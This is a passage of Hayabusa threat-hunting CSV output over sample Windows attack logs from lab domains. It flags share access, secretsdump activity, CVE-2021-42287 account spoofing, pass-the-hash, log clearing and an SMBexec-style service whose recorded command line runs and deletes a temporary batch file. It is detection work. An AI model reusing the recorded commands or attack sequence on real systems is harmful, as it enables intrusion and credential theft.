LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.051 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.067 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.084 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.086 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 
20:53:31.105 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.123 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user 
file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.139 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.154 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:31.154 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 21:01:18.896 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\drivers\etc\hosts | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 2592 | PGUID: A57649D1-E44F-61B5-D88F-850800000000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1565-Data manipulation/ID11-DNS hosts files modified.evtx +2021-12-13 02:57:17.006 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.272 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: lgrove | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.277 +09:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: lgrove@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.278 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: - | IP Addr: 172.16.66.19 | LID: 0x738ae4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.325 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738afd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.372 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738ce4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.375 +09:00,01566s-win16-ir.threebeesco.com,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,../hayabusa-rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.473 +09:00,01566s-win16-ir.threebeesco.com,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,../hayabusa-rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_Kerberoasting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.473 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: 01566s-win16-ir | Svc: krbtgt | IP Addr: ::ffff:172.16.66.19 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.497 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: lgrove | Computer: 04246W-WIN10 | IP Addr: 172.16.66.19 | LID: 0x738cf9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 02:57:52.518 +09:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: 01566s-win16-ir@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 17:21:30.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS\ETC | IP Addr: 10.23.23.9 | LID: 
0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 17:21:30.767 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts:Zone.Identifier | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 17:21:30.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 17:21:30.829 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 17:21:30.845 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.23.9 | LID: 
0x8ca6e1d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 21:55:45.250 +09:00,rootdc1.offsec.lan,7045,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-4697-SMBexec service registration.evtx +2021-12-13 21:55:45.250 +09:00,rootdc1.offsec.lan,4697,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x2cff42b44,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-4697-SMBexec service registration.evtx +2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: attacker | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: attacker | IP Addr: 10.23.123.11 | LID: 
0x308fabb0c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:48.182 +09:00,rootdc1.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:48.690 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:48.690 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:48.693 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack1 | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:48.696 +09:00,rootdc1.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin 
(CVE-2021-42287).evtx" +2021-12-14 23:42:48.908 +09:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,../hayabusa-rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:48.908 +09:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,../hayabusa-rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4781-Computer account renamed without a trailing $ (CVE-2021-42278).evtx +2021-12-14 23:42:49.222 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.222 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx +2021-12-14 23:42:49.255 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin 
(CVE-2021-42287).evtx" +2021-12-14 23:42:49.255 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx +2021-12-14 23:42:49.287 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.306 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.309 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.886 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmhorvath | Computer: - | IP Addr: 10.23.123.11 | LID: 
0x308fd3169,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.889 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.927 +09:00,rootdc1.offsec.lan,4697,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | User: admmhorvath | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.937 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1624 | User: ROOTDC1$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.947 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1138 | User: ROOTDC1$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.986 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 127.0.0.1 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:49.989 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 